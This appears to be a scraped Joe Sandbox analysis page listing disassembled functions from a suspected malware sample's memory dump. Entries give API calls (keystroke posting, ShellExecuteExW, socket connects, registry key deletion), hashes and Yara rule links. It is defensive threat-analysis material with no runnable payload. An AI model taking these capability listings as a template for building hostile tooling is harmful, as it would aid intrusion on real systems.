Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d8f19b7a51b8d64acb72f1e72d506d01dc06282473b353551c3b92efe5ba3605
Instruction ID: 7df0781612c2dd0c7163d437cec37935b2b0c7936ee5b04cdad265caacb08cdd
Opcode Fuzzy Hash: d8f19b7a51b8d64acb72f1e72d506d01dc06282473b353551c3b92efe5ba3605
Instruction Fuzzy Hash: 2621F671604205BBD214A6298C83FBF3BDCEF123A4F1400E0FE46A6293F759DE1182E5

Function 00B7ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

Part of subcall function 00B2FEC6: _wcscpy.LIBCMT ref: 00B2FEE9

_wcstok.LIBCMT ref: 00B7EEFF
_wcscpy.LIBCMT ref: 00B7EF8E
_memset.LIBCMT ref: 00B7EFC1

Strings

X, xrefs: 00B7EFFE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: a8109a454499cba33817c3c700cc4ce1aa1977aeb30ace38d0ac459d498ee987
Instruction ID: 48c86de28bb2458ea3a37580bea2cba49cfccfa0fa7c9e6286c5223a1dd3e102
Opcode Fuzzy Hash: a8109a454499cba33817c3c700cc4ce1aa1977aeb30ace38d0ac459d498ee987
Instruction Fuzzy Hash: E1C17371508341DFD724EF24C895AAAB7E4FF84310F5089ADF4A9972A2DB30ED45CB92

Function 00B11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ed550bd08aca8e952d407ca245eda2cb2ca95dc1bca0db3a8994737dfc9364
Instruction ID: 99e79067bc44f277e672fdf6cc50553b8c2399fbac7fccdf5c51366130f309a0
Opcode Fuzzy Hash: c9ed550bd08aca8e952d407ca245eda2cb2ca95dc1bca0db3a8994737dfc9364
Instruction Fuzzy Hash: 18715C70900109EFCB048F99CC85EFEBBB9FF85310F548599FA15AA251C730AA91CFA4

Function 00B86E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37447675acd6c5bcd8c8288c277173eab7a3d09292768d94b7264c55ccec08f7
Instruction ID: e46ae047b8fe826a6426ee6e2c4ff26e52b5b1f5906c9778ce2d8cfdfb82e4c7
Opcode Fuzzy Hash: 37447675acd6c5bcd8c8288c277173eab7a3d09292768d94b7264c55ccec08f7
Instruction Fuzzy Hash: 4761CE72508300ABC720EB24CC95EAFB7E9EF84718F604999F556972A2DE70ED44C792

Function 00B9B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(010B6368), ref: 00B9B6A5
IsWindowEnabled.USER32(010B6368), ref: 00B9B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B9B795
SendMessageW.USER32(010B6368,000000B0,?,?), ref: 00B9B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00B9B809
GetWindowLongW.USER32(010B6368,000000EC), ref: 00B9B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B9B843

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 64b17a3f7f7c67bd1f2b8d3d50e389d9b07270f3e0a0c452ca9348fcc116f87e
Instruction ID: 1acb23516e73aa1da547370dea4dfb24b4b1472a221da86f2535555c8fbfdb0c
Opcode Fuzzy Hash: 64b17a3f7f7c67bd1f2b8d3d50e389d9b07270f3e0a0c452ca9348fcc116f87e
Instruction Fuzzy Hash: 16719C34604204AFDF209FA4DAD4FBABBF9EB89310F1441BAE94597261CB31AD50DB60

Function 00B8F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8F75C
_memset.LIBCMT ref: 00B8F825
ShellExecuteExW.SHELL32(?), ref: 00B8F86A

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

Part of subcall function 00B2FEC6: _wcscpy.LIBCMT ref: 00B2FEE9

GetProcessId.KERNEL32(00000000), ref: 00B8F8E1
CloseHandle.KERNEL32(00000000), ref: 00B8F910

Strings

@, xrefs: 00B8F839

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 42981f7b056e58dbfe9a733cce6face4bf7a0b0798dc1f4b49780f1ef2d50e13
Instruction ID: 014089fe5a704252be9fd098fdffcf3095aff789e4f69f3c33986c65742d0f29
Opcode Fuzzy Hash: 42981f7b056e58dbfe9a733cce6face4bf7a0b0798dc1f4b49780f1ef2d50e13
Instruction Fuzzy Hash: 99618E75A0061ADFCF15EF54C5919AEBBF5FF48310F1484A9E84AAB361CB30AD80CB90

Function 00B7145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B7149C
GetKeyboardState.USER32(?), ref: 00B714B1
SetKeyboardState.USER32(?), ref: 00B71512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B71540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B7155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B715A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B715C8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 142d34e9e26c1c5fdf627899bd970ed23aaf2924081d22304a8ff2906a3cc87a
Instruction ID: 13d2e3e5c1b2bf40ddd9875123be854340877151cc451ee4962a948955addf68
Opcode Fuzzy Hash: 142d34e9e26c1c5fdf627899bd970ed23aaf2924081d22304a8ff2906a3cc87a
Instruction Fuzzy Hash: 8051D3A06047D53DFB36463C8C45BBA7EE99B46304F08C8C9E5E95A8C2C698DD84D770

Function 00B71276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B712B5
GetKeyboardState.USER32(?), ref: 00B712CA
SetKeyboardState.USER32(?), ref: 00B7132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B71357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B71374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B713B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B713D9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 91792a35c5d02addb6edb5049801bf0d6b02f3f600e6ac3d821da661a69b040b
Instruction ID: b4de2004dbf011588bb83c59e72d381b262696882870ec87f27ca1dd630d0517
Opcode Fuzzy Hash: 91792a35c5d02addb6edb5049801bf0d6b02f3f600e6ac3d821da661a69b040b
Instruction Fuzzy Hash: C151C2A05046D53DFB36862C8C55B7ABEE99B06300F08C9C9E1EC9A8C2D795EC94E774

Function 00B7589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B758AC
_wcsncpy.LIBCMT ref: 00B758E1
_wcsncpy.LIBCMT ref: 00B75913
_wcsncpy.LIBCMT ref: 00B75946
_wcsncpy.LIBCMT ref: 00B75988
_wcsncpy.LIBCMT ref: 00B759C2
_wcsncpy.LIBCMT ref: 00B759F1

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 35679e114cfa26c3c8095105abd1768728b9c6e0ab9489df7ede2c717b7c1218
Instruction ID: 507275925b0731107e79607713afc1337ccdbdf4b34522f25a8aee8f4dece823
Opcode Fuzzy Hash: 35679e114cfa26c3c8095105abd1768728b9c6e0ab9489df7ede2c717b7c1218
Instruction Fuzzy Hash: 12416265D20528B6CB11EBB48C869CFB3F89F05710F6089A6F618E3121E734E755C7A5

Function 00B738AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B738D3,?), ref: 00B748C7

Part of subcall function 00B748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B738D3,?), ref: 00B748E0

lstrcmpiW.KERNEL32(?,?), ref: 00B738F3
_wcscmp.LIBCMT ref: 00B7390F
MoveFileW.KERNEL32(?,?), ref: 00B73927
_wcscat.LIBCMT ref: 00B7396F
SHFileOperationW.SHELL32(?), ref: 00B739DB

Strings

\*.*, xrefs: 00B73969

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ac2976ad3236ecd9a13e7a0a1f7b1c278e5f99c0da1883dc3ad482bf8af01981
Instruction ID: 782842392466cdbf4e8f299d7cf652ff417eae62eb9cedb56bb89232c3179f49
Opcode Fuzzy Hash: ac2976ad3236ecd9a13e7a0a1f7b1c278e5f99c0da1883dc3ad482bf8af01981
Instruction Fuzzy Hash: 4D41827250C3449EC752EF64C481AEFB7E8EF88740F5049AEB59AC3151EB74D688C752

Function 00B97500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B97519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B975C0
IsMenu.USER32(?), ref: 00B975D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B97620
DrawMenuBar.USER32 ref: 00B97633

Strings

0, xrefs: 00B9750D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 46645454d68c7460b490aac78d15af2e86042e24100ba378f2774ccf6f0eac98
Instruction ID: 74f57c50ef68579c0b639b43549dfecad78828ac04ebe958f002568c1e620054
Opcode Fuzzy Hash: 46645454d68c7460b490aac78d15af2e86042e24100ba378f2774ccf6f0eac98
Instruction Fuzzy Hash: EF415875A15609EFDF20DF54D884EAABBF8FF09320F1480AAE91597250DB31AD50CFA0

Function 00B9122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B9125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B91286
FreeLibrary.KERNEL32(00000000), ref: 00B9133D

Part of subcall function 00B9122D: RegCloseKey.ADVAPI32(?), ref: 00B912A3
Part of subcall function 00B9122D: FreeLibrary.KERNEL32(?), ref: 00B912F5
Part of subcall function 00B9122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B91318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B912E0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 7f2fab91580b121491592b3cff23d0c275c8967219eb29ed1a8003787cd07f68
Instruction ID: 9f00b63fa28eb50bf9bb5f806c843c7def967dbf984ad5e6613e427dff19404f
Opcode Fuzzy Hash: 7f2fab91580b121491592b3cff23d0c275c8967219eb29ed1a8003787cd07f68
Instruction Fuzzy Hash: 42312DB1A0111ABFDF15DF94DD89AFEB7BCEF08310F0005BAE501E3151DA749E45AAA4

Function 00B9653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B9655B
GetWindowLongW.USER32(010B6368,000000F0), ref: 00B9658E
GetWindowLongW.USER32(010B6368,000000F0), ref: 00B965C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B965F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B9661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00B96630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B9664A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 8f2fdb0ed5b9045eaa33957853d0a5b3a5f7a583c6f4712a5942f0eb81853b90
Instruction ID: 8b6dcb61d5a9ba0c98c149c80eaf64e75c233eb4f34607371c9d72611a6cd301
Opcode Fuzzy Hash: 8f2fdb0ed5b9045eaa33957853d0a5b3a5f7a583c6f4712a5942f0eb81853b90
Instruction Fuzzy Hash: CC31EF30604255AFDF218F28DC95F653BE1FB5A760F1A01BAF511CB2B6CB62AC40DB51

Function 00B86486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B880CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B864D9
WSAGetLastError.WSOCK32(00000000), ref: 00B864E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B86521
connect.WSOCK32(00000000,?,00000010), ref: 00B8652A
WSAGetLastError.WSOCK32 ref: 00B86534
closesocket.WSOCK32(00000000), ref: 00B8655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B86576

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 51d5d2b4e1fe713120bd7b100f9c8099e36e1034b1852a20dc349397f6943d89
Instruction ID: 0c419d4bb1008899f2894d4abf0d78f4828cd437a931223ad41b1d4d55e92367
Opcode Fuzzy Hash: 51d5d2b4e1fe713120bd7b100f9c8099e36e1034b1852a20dc349397f6943d89
Instruction Fuzzy Hash: 43319131600218AFDB10AF64CC85BFE7BE9EF45764F0480A9F945E72A1DB74AD44CBA1

Function 00B6E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B6E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B6E120
SysAllocString.OLEAUT32(00000000), ref: 00B6E123
SysAllocString.OLEAUT32 ref: 00B6E144
SysFreeString.OLEAUT32 ref: 00B6E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00B6E167
SysAllocString.OLEAUT32(?), ref: 00B6E175

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7d2ae42f6316e39eddece2a32a480adbfd220f08668f6c45f9220b5991f6f173
Instruction ID: 6be4f31a4dc7783f11d77039d27b97f0e1b8d82a82c8a819ece09cb79cc02962
Opcode Fuzzy Hash: 7d2ae42f6316e39eddece2a32a480adbfd220f08668f6c45f9220b5991f6f173
Instruction Fuzzy Hash: 6C218635604109AFDF109FA8DC89CBB77ECEB09760B108176FA25DB260DA74DC419B64

Function 00B9783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B978A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B978AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B978B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B978C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B978D4

Strings

Msctls_Progress32, xrefs: 00B97872

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: af3b2b26abb64f5358a38987fd6ca09b338a5f5cdea7174b2521d38d4a645490
Instruction ID: b7b66f2f8bd25e87367fb091be7335228a8f9a9729c8bcadcf131ce1ba766b1c
Opcode Fuzzy Hash: af3b2b26abb64f5358a38987fd6ca09b338a5f5cdea7174b2521d38d4a645490
Instruction Fuzzy Hash: 491163B1550219BFEF159F65CC85EEB7F9DEF08758F014125BA04A6090CB719C21DBA4

Function 00B341C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B34292,?), ref: 00B341E3
GetProcAddress.KERNEL32(00000000), ref: 00B341EA
EncodePointer.KERNEL32(00000000), ref: 00B341F6
DecodePointer.KERNEL32(00000001,00B34292,?), ref: 00B34213

Strings

RoInitialize, xrefs: 00B341D2
combase.dll, xrefs: 00B341DE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
